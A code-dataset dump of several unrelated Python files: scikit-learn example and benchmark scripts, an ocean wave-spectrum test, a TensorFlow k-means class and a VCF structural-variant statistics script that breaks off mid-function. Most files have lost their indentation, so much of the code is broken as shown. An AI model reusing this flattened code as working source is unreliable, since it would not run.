| apache-2.0 |
ilo10/scikit-learn | benchmarks/bench_plot_parallel_pairwise.py | 297 | 1247 | # Author: Mathieu Blondel <mathieu@mblondel.org>
# License: BSD 3 clause
import time
import pylab as pl
from sklearn.utils import check_random_state
from sklearn.metrics.pairwise import pairwise_distances
from sklearn.metrics.pairwise import pairwise_kernels
def plot(func):
random_state = check_random_state(0)
one_core = []
multi_core = []
sample_sizes = range(1000, 6000, 1000)
for n_samples in sample_sizes:
X = random_state.rand(n_samples, 300)
start = time.time()
func(X, n_jobs=1)
one_core.append(time.time() - start)
start = time.time()
func(X, n_jobs=-1)
multi_core.append(time.time() - start)
pl.figure('scikit-learn parallel %s benchmark results' % func.__name__)
pl.plot(sample_sizes, one_core, label="one core")
pl.plot(sample_sizes, multi_core, label="multi core")
pl.xlabel('n_samples')
pl.ylabel('Time (s)')
pl.title('Parallel %s' % func.__name__)
pl.legend()
def euclidean_distances(X, n_jobs):
return pairwise_distances(X, metric="euclidean", n_jobs=n_jobs)
def rbf_kernels(X, n_jobs):
return pairwise_kernels(X, metric="rbf", n_jobs=n_jobs, gamma=0.1)
plot(euclidean_distances)
plot(rbf_kernels)
pl.show()
| bsd-3-clause |
pakodekker/oceansar | misc/dressed_spectrum_v2.py | 1 | 8434 | """
WAVESIM Test - Maria 2014
Testing program to obtain the dressed spectrum of Choppy waves,
in comparsion with the theoretical linear one.
The number of realizations can be selected
"""
import numpy as np
from scipy import linalg
from trampa import utils
from oceansar import spec
from oceansar import spread
import matplotlib.pyplot as plt
from matplotlib import mlab
from matplotlib import cm
from matplotlib.colors import LogNorm
# Step 1: Create ocean surface
# Selected parameters
# Lx: surface X dimension [m]
Lx = 512.
# Ly: surface X dimension [m]
Ly = 512.
# dx: surface X resolution [m]
dx = 0.5
# dy: surface Y resolution [m]
dy = 0.5
# spec_model: omnidirection spectrum model
spec_model = 'elfouhaily'
# spread_model: spreading function model
spread_model = 'elfouhaily'
# wind_dir: wind direction (rad)
wind_dir = np.deg2rad(45.)
# wind_fetch: wind fetch (m)
wind_fetch = 500.e3
# wind_U: wind speed (m/s)
wind_U = 11.
# current_mag: current magnitude
current_mag = 0.
# current_dir: current direction (rad)
current_dir = np.deg2rad(0.)
#fft_max_prime: maximum prime factor allowed in matrix sizes
fft_max_prime = 3
# zp_value: factor for zero-padding
zp_value = 4
# Niter: number of realizations
Niter = 10
# Grid dimensions - optimazed
Nx = np.int(Lx/dx)
Ny = np.int(Ly/dy)
Nx = utils.optimize_fftsize(Nx, fft_max_prime)
Ny = utils.optimize_fftsize(Ny, fft_max_prime)
dx = Lx/np.float(Nx)
dy = Ly/np.float(Ny)
# X-Y vector - linespace can be problematic, refinement with arange
x = np.linspace(-Lx/2., Lx/2., Nx)
x = (np.arange(x.size) - x.size/2) * (x[1]-x[0])
y = np.linspace(-Ly/2., Ly/2., Ny)
y = (np.arange(y.size) - y.size/2) * (y[1]-y[0])
x, y = np.meshgrid(x, y)
# Currents
current = current_mag * np.array([np.cos(current_dir), np.sin(current_dir)])
U_eff_vec = (wind_U * np.array([np.cos(wind_dir), np.sin(wind_dir)]) - current)
wind_U_eff = linalg.norm(U_eff_vec)
wind_dir_eff = np.arctan2(U_eff_vec[1], U_eff_vec[0])
# Kx-Ky meshgrid
kx = 2.*np.pi*np.fft.fftfreq(Nx, dx)
ky = 2.*np.pi*np.fft.fftfreq(Ny, dy)
kx, ky = np.meshgrid(kx, ky)
# Kx-Ky resolution
kx_res = kx[0, 1] - kx[0, 0]
ky_res = ky[1, 0] - ky[0, 0]
# K-theta meshgrid (Polar, wind direction shifted)
k = np.sqrt(kx**2 + ky**2)
good_k = np.where(k > np.min(np.array([kx_res, ky_res]))/2.0)
kinv = np.zeros(k.shape)
kinv[good_k] = 1./k[good_k]
theta = np.angle(np.exp(1j * (np.arctan2(ky, kx) - wind_dir_eff)))
# Compute directional wave spectrum (1/k*S(k)*D(k,theta))
wave_spec = np.zeros(k.shape)
wave_spec[good_k] = spec.models[spec_model](k[good_k], wind_U_eff, wind_fetch)
wave_spread = np.zeros(k.shape)
wave_spread[good_k] = spread.models[spread_model](k[good_k], theta[good_k],
wind_U_eff, wind_fetch)
wave_dirspec = kinv*wave_spec*wave_spread
# Spectrum with zero padding
wave_dirspec = np.fft.fftshift(wave_dirspec)
wave_dirspec_zp = np.zeros([zp_value*Ny,zp_value*Nx])
wave_dirspec_zp[0:Ny,0:Nx] = wave_dirspec
wave_dirspec = np.roll(np.roll(wave_dirspec, -Nx/2, axis=1), -Ny/2, axis=0)
wave_dirspec_zp = np.roll(np.roll(wave_dirspec_zp, -Nx/2, axis=1), -Ny/2, axis=0)
# new x-y
x_new = np.linspace(-Lx/2., Lx/2., zp_value*Nx)
y_new = np.linspace(-Ly/2., Ly/2., zp_value*Ny)
x_new, y_new = np.meshgrid(x_new, y_new)
# new Kx-Ky
kx_new = 2.*np.pi*np.fft.fftfreq(zp_value*Nx, dx/zp_value)
ky_new = 2.*np.pi*np.fft.fftfreq(zp_value*Ny, dy/zp_value)
kx_new, ky_new = np.meshgrid(kx_new, ky_new)
# new x-y resolution
x_res = x_new[0, 1] - x_new[0, 0]
y_res = y_new[1, 0] - y_new[0, 0]
# new Kx-Ky resolution - same than before!
kx_res_new = kx_new[0, 1] - kx_new[0, 0]
ky_res_new = ky_new[1, 0] - ky_new[0, 0]
# new K-theta meshgrid (Polar, wind direction shifted)
k_new = np.sqrt(kx_new**2 + ky_new**2)
good_k_new = np.where(k_new > np.min(np.array([kx_res_new, ky_res_new]))/2.0)
kinv_new = np.zeros(k_new.shape)
kinv_new[good_k_new] = 1./k_new[good_k_new]
theta_new = np.angle(np.exp(1j * (np.arctan2(ky_new, kx_new) - wind_dir_eff)))
wave_spectrum_vect = np.zeros([Ny,Nx,Niter])
for nnn in range (Niter):
# Complex Gaussian to randomize spectrum coefficients
random_cg = 1./np.sqrt(2.)*(np.random.normal(0., 1., size=[zp_value*Ny, zp_value*Nx]) +
1j*np.random.normal(0., 1., size=[zp_value*Ny, zp_value*Nx]))
# Initialize coefficients
wave_coefs = zp_value**2*Nx*Ny*np.sqrt(2.*wave_dirspec_zp*kx_res_new*ky_res_new)*random_cg
# HORIZ. DISPL. & HEIGHT FIELD (Dx, Dy, Dz)
Dx = np.real(np.fft.ifft2(1j*kx_new*kinv_new*wave_coefs))
Dy = np.real(np.fft.ifft2(1j*ky_new*kinv_new*wave_coefs))
Dz = np.real(np.fft.ifft2(wave_coefs))
#print 'The mean and variance of Dz are: ', np.mean(Dz), np.var(Dz)
# Step 2: Obtain the real choppy surface
# Irregular x-y grid
x_irr, y_irr = (x_new + Dx, y_new + Dy)
# Interpolate using Delaunay triangularizations to the regular grid
z = mlab.griddata(x_irr.flatten(), y_irr.flatten(), Dz.flatten(), x, y, interp='linear')
# Remove possible 'masked' values
z = np.where(z.mask == True, 0.0, z)
# Create a 2-D Hanning window
win_x = np.hanning(Nx)
win_y = np.hanning(Ny)
win_2D = np.sqrt(np.outer(win_y,win_x))
# Insert the window to the surface
z_new = z * win_2D
# New wave directional spectrum (wave_spectrum=smooth(abs(2*fft(Dz))^2))
# Notice that factor 2 is for the amplitude correction due to Hanning window
wave_spectrum = utils.smooth((np.abs(np.fft.fftshift(2.*np.fft.fft2(z_new))))**2., window_len=3)
wave_spectrum = np.roll(np.roll(wave_spectrum, -Nx/2, axis=0), -Ny/2, axis=1)
# Normalization of the spectrum (opposite to the theoretical case)
wave_spectrum = (2.*wave_spectrum)/((Nx*Ny)**2*(kx_res*ky_res))
wave_spectrum_vect[:,:,nnn] = wave_spectrum
# Averaging of the different realizations
wave_spectrum = np.zeros([Ny,Nx])
wave_spectrum = np.sum(wave_spectrum_vect, axis=2)/Niter
# Save memory!
wave_spectrum_vect = 0.0
# Only waves travelling in one main direction: half spectrum - factor of 2
wave_dirspec2 = np.zeros(k.shape)
wave_dirspec2[good_k] = wave_spectrum[good_k]
wave_dirspec2 = np.where((theta > -np.pi/2.) & (theta < np.pi/2.),
wave_dirspec2, 0)
# Step 3: Plots for the comparison of dressed and undressed spectrums
# Plots
plt.figure()
plt.imshow(np.fft.fftshift(wave_dirspec), origin='lower', cmap=cm.jet,
norm=LogNorm(vmin=1.e-5, vmax=1.e2))
plt.colorbar()
plt.title('[Original] Undressed spectrum')
plt.show()
#plt.figure()
#plt.imshow(np.fft.fftshift(wave_dirspec_zp), origin='lower', cmap=cm.jet,
# norm=LogNorm(vmin=1.e-5, vmax=1.e2))
#plt.colorbar()
#plt.title('[0-Padding] Undressed spectrum')
#plt.show()
plt.figure()
plt.imshow(np.fft.fftshift(wave_dirspec2), origin='lower', cmap=cm.jet,
norm=LogNorm(vmin=1.e-5, vmax=1.e2))
plt.colorbar()
plt.title('Dressed spectrum')
plt.show()
plt.figure()
plt.loglog(np.diag(k[0:Ny/2,0:Nx/2]), np.diag(wave_dirspec[0:Ny/2,0:Nx/2]),
color='red', label='Undressed')
plt.loglog(np.diag(k[0:Ny/2,0:Nx/2]), np.diag(wave_dirspec2[0:Ny/2,0:Nx/2]),
color='blue', label='Dressed')
v = [1.e-2, 1.e2, 1.e-8, 1.e2]
plt.axis(v)
plt.title('Diagonal with '+r'$\theta=\pi/4$'+' (rad)')
plt.xlabel('Wave number '+r'$k$' + ' (rad/m)')
plt.ylabel('Wave directional spectrum '+r'$\Phi(k)$')
plt.grid(True)
plt.legend(loc='best')
plt.show()
plt.figure()
plt.loglog(k[1,0:Nx/2], wave_dirspec[1,0:Nx/2], color='red', label='Undressed')
plt.loglog(k[1,0:Nx/2], wave_dirspec2[1,0:Nx/2], color='blue', label='Dressed')
v = [1.e-2, 1.e2, 1.e-8, 1.e2]
plt.axis(v)
plt.title('Horizontal with '+r'$\theta=\pi/4$'+' (rad)')
plt.xlabel('Wave number '+r'$k$' + ' (rad/m)')
plt.ylabel('Wave directional spectrum '+r'$\Phi(k)$')
plt.grid(True)
plt.legend(loc='best')
plt.show()
plt.figure()
plt.loglog(k[0:Ny/2,1], wave_dirspec[0:Ny/2,1], color='red', label='Undressed')
plt.loglog(k[0:Ny/2,1], wave_dirspec2[0:Ny/2,1], color='blue', label='Dressed')
v = [1.e-2, 1.e2, 1.e-8, 1.e2]
plt.axis(v)
plt.title('Vertical with '+r'$\theta=\pi/4$'+' (rad)')
plt.xlabel('Wave number '+r'$k$' + ' (rad/m)')
plt.ylabel('Wave directional spectrum '+r'$\Phi(k)$')
plt.grid(True)
plt.legend(loc='best')
plt.show()
| gpl-3.0 |
kaichogami/scikit-learn | examples/decomposition/plot_incremental_pca.py | 175 | 1974 | """
===============
Incremental PCA
===============
Incremental principal component analysis (IPCA) is typically used as a
replacement for principal component analysis (PCA) when the dataset to be
decomposed is too large to fit in memory. IPCA builds a low-rank approximation
for the input data using an amount of memory which is independent of the
number of input data samples. It is still dependent on the input data features,
but changing the batch size allows for control of memory usage.
This example serves as a visual check that IPCA is able to find a similar
projection of the data to PCA (to a sign flip), while only processing a
few samples at a time. This can be considered a "toy example", as IPCA is
intended for large datasets which do not fit in main memory, requiring
incremental approaches.
"""
print(__doc__)
# Authors: Kyle Kastner
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import load_iris
from sklearn.decomposition import PCA, IncrementalPCA
iris = load_iris()
X = iris.data
y = iris.target
n_components = 2
ipca = IncrementalPCA(n_components=n_components, batch_size=10)
X_ipca = ipca.fit_transform(X)
pca = PCA(n_components=n_components)
X_pca = pca.fit_transform(X)
colors = ['navy', 'turquoise', 'darkorange']
for X_transformed, title in [(X_ipca, "Incremental PCA"), (X_pca, "PCA")]:
plt.figure(figsize=(8, 8))
for color, i, target_name in zip(colors, [0, 1, 2], iris.target_names):
plt.scatter(X_transformed[y == i, 0], X_transformed[y == i, 1],
color=color, lw=2, label=target_name)
if "Incremental" in title:
err = np.abs(np.abs(X_pca) - np.abs(X_ipca)).mean()
plt.title(title + " of iris dataset\nMean absolute unsigned error "
"%.6f" % err)
else:
plt.title(title + " of iris dataset")
plt.legend(loc="best", shadow=False, scatterpoints=1)
plt.axis([-4, 4, -1.5, 1.5])
plt.show()
| bsd-3-clause |
loli/sklearn-ensembletrees | examples/linear_model/plot_ransac.py | 250 | 1673 | """
===========================================
Robust linear model estimation using RANSAC
===========================================
In this example we see how to robustly fit a linear model to faulty data using
the RANSAC algorithm.
"""
import numpy as np
from matplotlib import pyplot as plt
from sklearn import linear_model, datasets
n_samples = 1000
n_outliers = 50
X, y, coef = datasets.make_regression(n_samples=n_samples, n_features=1,
n_informative=1, noise=10,
coef=True, random_state=0)
# Add outlier data
np.random.seed(0)
X[:n_outliers] = 3 + 0.5 * np.random.normal(size=(n_outliers, 1))
y[:n_outliers] = -3 + 10 * np.random.normal(size=n_outliers)
# Fit line using all data
model = linear_model.LinearRegression()
model.fit(X, y)
# Robustly fit linear model with RANSAC algorithm
model_ransac = linear_model.RANSACRegressor(linear_model.LinearRegression())
model_ransac.fit(X, y)
inlier_mask = model_ransac.inlier_mask_
outlier_mask = np.logical_not(inlier_mask)
# Predict data of estimated models
line_X = np.arange(-5, 5)
line_y = model.predict(line_X[:, np.newaxis])
line_y_ransac = model_ransac.predict(line_X[:, np.newaxis])
# Compare estimated coefficients
print("Estimated coefficients (true, normal, RANSAC):")
print(coef, model.coef_, model_ransac.estimator_.coef_)
plt.plot(X[inlier_mask], y[inlier_mask], '.g', label='Inliers')
plt.plot(X[outlier_mask], y[outlier_mask], '.r', label='Outliers')
plt.plot(line_X, line_y, '-k', label='Linear regressor')
plt.plot(line_X, line_y_ransac, '-b', label='RANSAC regressor')
plt.legend(loc='lower right')
plt.show()
| bsd-3-clause |
themrmax/scikit-learn | examples/tree/plot_iris.py | 86 | 1965 | """
================================================================
Plot the decision surface of a decision tree on the iris dataset
================================================================
Plot the decision surface of a decision tree trained on pairs
of features of the iris dataset.
See :ref:`decision tree <tree>` for more information on the estimator.
For each pair of iris features, the decision tree learns decision
boundaries made of combinations of simple thresholding rules inferred from
the training samples.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import load_iris
from sklearn.tree import DecisionTreeClassifier
# Parameters
n_classes = 3
plot_colors = "bry"
plot_step = 0.02
# Load data
iris = load_iris()
for pairidx, pair in enumerate([[0, 1], [0, 2], [0, 3],
[1, 2], [1, 3], [2, 3]]):
# We only take the two corresponding features
X = iris.data[:, pair]
y = iris.target
# Train
clf = DecisionTreeClassifier().fit(X, y)
# Plot the decision boundary
plt.subplot(2, 3, pairidx + 1)
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),
np.arange(y_min, y_max, plot_step))
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
cs = plt.contourf(xx, yy, Z, cmap=plt.cm.Paired)
plt.xlabel(iris.feature_names[pair[0]])
plt.ylabel(iris.feature_names[pair[1]])
plt.axis("tight")
# Plot the training points
for i, color in zip(range(n_classes), plot_colors):
idx = np.where(y == i)
plt.scatter(X[idx, 0], X[idx, 1], c=color, label=iris.target_names[i],
cmap=plt.cm.Paired)
plt.axis("tight")
plt.suptitle("Decision surface of a decision tree using paired features")
plt.legend()
plt.show()
| bsd-3-clause |
Obus/scikit-learn | examples/manifold/plot_mds.py | 261 | 2616 | """
=========================
Multi-dimensional scaling
=========================
An illustration of the metric and non-metric MDS on generated noisy data.
The reconstructed points using the metric MDS and non metric MDS are slightly
shifted to avoid overlapping.
"""
# Author: Nelle Varoquaux <nelle.varoquaux@gmail.com>
# Licence: BSD
print(__doc__)
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.collections import LineCollection
from sklearn import manifold
from sklearn.metrics import euclidean_distances
from sklearn.decomposition import PCA
n_samples = 20
seed = np.random.RandomState(seed=3)
X_true = seed.randint(0, 20, 2 * n_samples).astype(np.float)
X_true = X_true.reshape((n_samples, 2))
# Center the data
X_true -= X_true.mean()
similarities = euclidean_distances(X_true)
# Add noise to the similarities
noise = np.random.rand(n_samples, n_samples)
noise = noise + noise.T
noise[np.arange(noise.shape[0]), np.arange(noise.shape[0])] = 0
similarities += noise
mds = manifold.MDS(n_components=2, max_iter=3000, eps=1e-9, random_state=seed,
dissimilarity="precomputed", n_jobs=1)
pos = mds.fit(similarities).embedding_
nmds = manifold.MDS(n_components=2, metric=False, max_iter=3000, eps=1e-12,
dissimilarity="precomputed", random_state=seed, n_jobs=1,
n_init=1)
npos = nmds.fit_transform(similarities, init=pos)
# Rescale the data
pos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((pos ** 2).sum())
npos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((npos ** 2).sum())
# Rotate the data
clf = PCA(n_components=2)
X_true = clf.fit_transform(X_true)
pos = clf.fit_transform(pos)
npos = clf.fit_transform(npos)
fig = plt.figure(1)
ax = plt.axes([0., 0., 1., 1.])
plt.scatter(X_true[:, 0], X_true[:, 1], c='r', s=20)
plt.scatter(pos[:, 0], pos[:, 1], s=20, c='g')
plt.scatter(npos[:, 0], npos[:, 1], s=20, c='b')
plt.legend(('True position', 'MDS', 'NMDS'), loc='best')
similarities = similarities.max() / similarities * 100
similarities[np.isinf(similarities)] = 0
# Plot the edges
start_idx, end_idx = np.where(pos)
#a sequence of (*line0*, *line1*, *line2*), where::
# linen = (x0, y0), (x1, y1), ... (xm, ym)
segments = [[X_true[i, :], X_true[j, :]]
for i in range(len(pos)) for j in range(len(pos))]
values = np.abs(similarities)
lc = LineCollection(segments,
zorder=0, cmap=plt.cm.hot_r,
norm=plt.Normalize(0, values.max()))
lc.set_array(similarities.flatten())
lc.set_linewidths(0.5 * np.ones(len(segments)))
ax.add_collection(lc)
plt.show()
| bsd-3-clause |
jmhsi/justin_tinker | data_science/courses/deeplearning2/kmeans.py | 10 | 2802 | import tensorflow as tf
import math, numpy as np
import matplotlib.pyplot as plt
def plot_data(centroids, data, n_samples):
colour = plt.cm.rainbow(np.linspace(0,1,len(centroids)))
for i, centroid in enumerate(centroids):
samples = data[i*n_samples:(i+1)*n_samples]
plt.scatter(samples[:,0], samples[:,1], c=colour[i], s=1)
plt.plot(centroid[0], centroid[1], markersize=10, marker="x", color='k', mew=5)
plt.plot(centroid[0], centroid[1], markersize=5, marker="x", color='m', mew=2)
def all_distances(a, b):
diff = tf.squared_difference(tf.expand_dims(a, 0), tf.expand_dims(b,1))
return tf.reduce_sum(diff, axis=2)
class Kmeans(object):
def __init__(self, data, n_clusters):
self.n_data, self.n_dim = data.shape
self.n_clusters = n_clusters
self.data = data
self.v_data = tf.Variable(data)
self.n_samples = self.n_data//self.n_clusters
def run(self):
tf.global_variables_initializer().run()
initial_centroids = self.find_initial_centroids(self.n_clusters).eval()
curr_centroids = tf.Variable(initial_centroids)
nearest_indices = self.assign_to_nearest(curr_centroids)
updated_centroids = self.update_centroids(nearest_indices)
# Begin main algorithm
tf.global_variables_initializer().run()
c = initial_centroids
for i in range(10):
c2 = curr_centroids.assign(updated_centroids).eval()
if np.allclose(c,c2): break
c=c2
return c2
def find_initial_centroids(self, k):
r_index = tf.random_uniform([1], 0, self.n_data, dtype=tf.int32)
r = tf.expand_dims(self.v_data[tf.squeeze(r_index)], dim=1)
initial_centroids = []
for i in range(k):
dist = all_distances(self.v_data, r)
farthest_index = tf.argmax(tf.reduce_min(dist, axis=0), 0)
farthest_point = self.v_data[tf.to_int32(farthest_index)]
initial_centroids.append(farthest_point)
r = tf.stack(initial_centroids)
return r
def choose_random_centroids(self):
n_samples = tf.shape(v_data)[0]
random_indices = tf.random_shuffle(tf.range(0, n_samples))
centroid_indices = random_indices[:self.n_clusters]
return tf.gather(self.v_data, centroid_indices)
def assign_to_nearest(self, centroids):
return tf.argmin(all_distances(self.v_data, centroids), 0)
def update_centroids(self, nearest_indices):
partitions = tf.dynamic_partition(self.v_data, tf.to_int32(nearest_indices), self.n_clusters)
return tf.concat([tf.expand_dims(tf.reduce_mean(partition, 0), 0)
for partition in partitions], 0)
| apache-2.0 |
quheng/scikit-learn | examples/cluster/plot_kmeans_stability_low_dim_dense.py | 338 | 4324 | """
============================================================
Empirical evaluation of the impact of k-means initialization
============================================================
Evaluate the ability of k-means initializations strategies to make
the algorithm convergence robust as measured by the relative standard
deviation of the inertia of the clustering (i.e. the sum of distances
to the nearest cluster center).
The first plot shows the best inertia reached for each combination
of the model (``KMeans`` or ``MiniBatchKMeans``) and the init method
(``init="random"`` or ``init="kmeans++"``) for increasing values of the
``n_init`` parameter that controls the number of initializations.
The second plot demonstrate one single run of the ``MiniBatchKMeans``
estimator using a ``init="random"`` and ``n_init=1``. This run leads to
a bad convergence (local optimum) with estimated centers stuck
between ground truth clusters.
The dataset used for evaluation is a 2D grid of isotropic Gaussian
clusters widely spaced.
"""
print(__doc__)
# Author: Olivier Grisel <olivier.grisel@ensta.org>
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from sklearn.utils import shuffle
from sklearn.utils import check_random_state
from sklearn.cluster import MiniBatchKMeans
from sklearn.cluster import KMeans
random_state = np.random.RandomState(0)
# Number of run (with randomly generated dataset) for each strategy so as
# to be able to compute an estimate of the standard deviation
n_runs = 5
# k-means models can do several random inits so as to be able to trade
# CPU time for convergence robustness
n_init_range = np.array([1, 5, 10, 15, 20])
# Datasets generation parameters
n_samples_per_center = 100
grid_size = 3
scale = 0.1
n_clusters = grid_size ** 2
def make_data(random_state, n_samples_per_center, grid_size, scale):
random_state = check_random_state(random_state)
centers = np.array([[i, j]
for i in range(grid_size)
for j in range(grid_size)])
n_clusters_true, n_features = centers.shape
noise = random_state.normal(
scale=scale, size=(n_samples_per_center, centers.shape[1]))
X = np.concatenate([c + noise for c in centers])
y = np.concatenate([[i] * n_samples_per_center
for i in range(n_clusters_true)])
return shuffle(X, y, random_state=random_state)
# Part 1: Quantitative evaluation of various init methods
fig = plt.figure()
plots = []
legends = []
cases = [
(KMeans, 'k-means++', {}),
(KMeans, 'random', {}),
(MiniBatchKMeans, 'k-means++', {'max_no_improvement': 3}),
(MiniBatchKMeans, 'random', {'max_no_improvement': 3, 'init_size': 500}),
]
for factory, init, params in cases:
print("Evaluation of %s with %s init" % (factory.__name__, init))
inertia = np.empty((len(n_init_range), n_runs))
for run_id in range(n_runs):
X, y = make_data(run_id, n_samples_per_center, grid_size, scale)
for i, n_init in enumerate(n_init_range):
km = factory(n_clusters=n_clusters, init=init, random_state=run_id,
n_init=n_init, **params).fit(X)
inertia[i, run_id] = km.inertia_
p = plt.errorbar(n_init_range, inertia.mean(axis=1), inertia.std(axis=1))
plots.append(p[0])
legends.append("%s with %s init" % (factory.__name__, init))
plt.xlabel('n_init')
plt.ylabel('inertia')
plt.legend(plots, legends)
plt.title("Mean inertia for various k-means init across %d runs" % n_runs)
# Part 2: Qualitative visual inspection of the convergence
X, y = make_data(random_state, n_samples_per_center, grid_size, scale)
km = MiniBatchKMeans(n_clusters=n_clusters, init='random', n_init=1,
random_state=random_state).fit(X)
fig = plt.figure()
for k in range(n_clusters):
my_members = km.labels_ == k
color = cm.spectral(float(k) / n_clusters, 1)
plt.plot(X[my_members, 0], X[my_members, 1], 'o', marker='.', c=color)
cluster_center = km.cluster_centers_[k]
plt.plot(cluster_center[0], cluster_center[1], 'o',
markerfacecolor=color, markeredgecolor='k', markersize=6)
plt.title("Example cluster allocation with a single random init\n"
"with MiniBatchKMeans")
plt.show()
| bsd-3-clause |
bioinformatics-centre/AsmVar | src/AsmvarVarScore/AGE_Stat.py | 2 | 8989 | """
========================================================
Statistic the SV Stat after AGE Process
========================================================
Author : Shujia Huang
Date : 2014-03-07 0idx:54:15
"""
import sys
import re
import os
import string
import numpy as np
import matplotlib.pyplot as plt
def DrawFig( figureFile, distance, leftIden, rigthIden, nr, aa, bb ) :
fig = plt.figure( num=None, figsize=(16, 18), facecolor='w', edgecolor='k' )
title = ['Distance distribution', 'NRatio', 'Perfect Depth', 'Imperfect depth']
ylabel = ['The position of breakpoint', \
'N Ratio of varints', 'Perfect Depth', 'Both ImPerfect Depth']
for i, data in enumerate ( [ distance, nr, aa, bb ] ) :
plt.subplot(4,2,2 * i + 1)
#plt.title(title[i], fontsize=16)
P = data[:,0] == 1; N = data[:,0] == 2; X = data[:,0] == 3
plt.scatter(data[:,1][P], data[:,2][P], marker='o', c = 'g', alpha=0.3, linewidths = 0, label = 'Positive' ) # Positive
plt.scatter(data[:,1][N], data[:,2][N], marker='o', c = 'r', alpha=0.3, linewidths = 0, label = 'Negative' ) # Negative
plt.scatter(data[:,1][X], data[:,2][X], marker='o', c = 'Y', alpha=0.3, linewidths = 0, label = 'Positive->Negative' ) # Positive->Negative
plt.legend(loc='upper right')
plt.xlabel('Score' , fontsize=16)
plt.ylabel ( ylabel[i] , fontsize=16 )
plt.subplot(4, 2, 2*i + 2)
NEW = data[:,0] == 0
good = data[:,1][NEW] >= 1.0; bad = data[:,1][NEW] < 1.0
plt.scatter( data[:,1][NEW][good], data[:,2][NEW][good], marker='o', c = 'b', alpha=0.4, linewidths = 0, label = 'good' ) # good
plt.scatter( data[:,1][NEW][bad] , data[:,2][NEW][bad] , marker='o', c = 'm', alpha=0.4, linewidths = 0, label = 'bad' ) # bad
plt.legend(loc='upper right')
plt.xlabel('Score' , fontsize=16)
fig.savefig(figureFile + '.png')
fig.savefig(figureFile + '.pdf')
def Accum ( data, isBig = False) :
tmpD= data
k = sorted( tmpD.keys(), key = lambda d: float(d) )
dat = []
for i in range( len(k) ) :
if isBig :
for j in range(i,len(k)) : tmpD[k[i]][1] += tmpD[k[j]][0]
else :
for j in range(i+1) : tmpD[k[i]][1] += tmpD[k[j]][0]
dat.append( [ float(k[i]), float(tmpD[k[i]][0]), float(tmpD[k[i]][1]) ] )
return dat
def SampleFaLen ( faLenFile ) :
if faLenFile[-3:] == '.gz' : I = os.popen( 'gzip -dc %s' % faLenFile )
else : I = open( faLenFile )
data = {}
while 1 :
lines = I.readlines ( 100000 )
if not lines : break
for line in lines :
col = line.strip('\n').split()
data[col[0]] = string.atoi( col[1] )
I.close()
return data
def LoadFaLen ( faLenLstFile ) :
data = {}
I = open (faLenLstFile)
for line in I.readlines() :
if len( line.strip('\n').split() ) != 2: raise ValueError('[ERROR] The format of Fa length list maybe not right. It could just be : "sample FalenghtFile", but found',line)
sampleId, fileName = line.strip('\n').split()
if sampleId not in data : data[sampleId] = {}
data[sampleId] = SampleFaLen( fileName )
I.close()
return data
def main ( argv ) :
qFaLen = LoadFaLen( argv[1] )
figPrefix = 'test'
if len(argv) > 2 : figPrefix = argv[2]
if argv[0][-3:] == '.gz' :
I = os.popen( 'gzip -dc %s' % argv[0] )
else :
I = open ( argv[0] )
s, annotations, mark = set(), [], []
print '#Chr\tPosition\tDistance\tLeftIden\tRightIden\tAveIden\tN-Ratio\tAA'
while 1 : # VCF format
lines = I.readlines( 100000 )
if not lines : break
for line in lines :
col = line.strip('\n').split()
if re.search( r'^#CHROM', line ) : col2sam = { i+9:sam for i,sam in enumerate(col[9:]) }
if re.search(r'^#', line) : continue
key = col[0] + ':' + col[1]
if key in s : continue
s.add(key)
#if re.search(r'^PASS', col[6] ) : continue
#if not re.search(r'_TRAIN_SITE', col[7]) : continue
if not re.search(r'^PASS', col[6] ) : continue
fmat = { k:i for i,k in enumerate( col[8].split(':') ) }
if 'VS' not in fmat or 'QR' not in fmat: continue
if len(annotations) == 0 : annotations = [ [] for _ in col[9:] ]
vcfinfo = { d.split('=')[0] : d.split('=')[1] for d in col[7].split(';') if len(d.split('=')) == 2 }
vq = string.atof( vcfinfo['VQ'] )
if 'POSITIVE_TRAIN_SITE' in col[7] and 'NEGATIVE_TRAIN_SITE' in col[7] :
mark.append( [3, vq] )
elif 'POSITIVE_TRAIN_SITE' in col[7] :
mark.append( [1, vq] )
elif 'NEGATIVE_TRAIN_SITE' in col[7] :
mark.append( [2, vq] )
else :
mark.append( [0, vq] )
for i, sample in enumerate ( col[9:] ) :
sampleId = col2sam[9+i]
qr = sample.split(':')[fmat['QR']].split(',')[-1]
if qr == '.' :
annotations[i].append( [0, 0, 0, 0, 0, 0] )
continue
qId, qSta, qEnd = qr.split('-')
qSta = string.atoi(qSta)
qEnd = string.atoi(qEnd)
if sampleId not in qFaLen : raise ValueError ('[ERROR] The sample name $s(in vcf) is not in the name of Fa list.' % sampleId )
if qId not in qFaLen[sampleId] : raise ValueError ('[ERROR]', qId, 'is not been found in file', opt.qFalen, '\n' )
qSta= int( qSta * 100 / qFaLen[sampleId][qId] + 0.5 )
qEnd= int( qEnd * 100 / qFaLen[sampleId][qId] + 0.5 )
if qSta > 100 or qEnd > 100 : raise ValueError ('[ERROR] Query size Overflow! sample : %s; scaffold : %s' % (sampleId, qId) )
leg = qSta
if 100 - qEnd < qSta : leg = qEnd
nn = string.atof(sample.split(':')[fmat['FN']])
n = round( 1000 * nn ) / 10.0
alt = string.atoi( sample.split(':')[fmat['AA']].split(',')[1] ) # Alternate perfect
bot = string.atoi( sample.split(':')[fmat['AA']].split(',')[3] ) # Both imperfect
pro = string.atoi( sample.split(':')[fmat['RP']].split(',')[0] ) # Proper Pair
ipr = string.atoi( sample.split(':')[fmat['RP']].split(',')[1] ) # ImProper Pair
annotations[i].append( [leg, n, alt, bot, pro, ipr] )
I.close()
if len( mark ) != len( annotations[0] ) : raise ValueError ('[ERROR] The size is not match!')
annotations = np.array( annotations );
sampleNum = len( annotations )
for i in range( sampleNum ) :
if np.sum(annotations[i]) == 0: continue
mean = np.array( [ d for d in annotations[i] if np.sum(d) > 0 ] ).mean(axis=0)
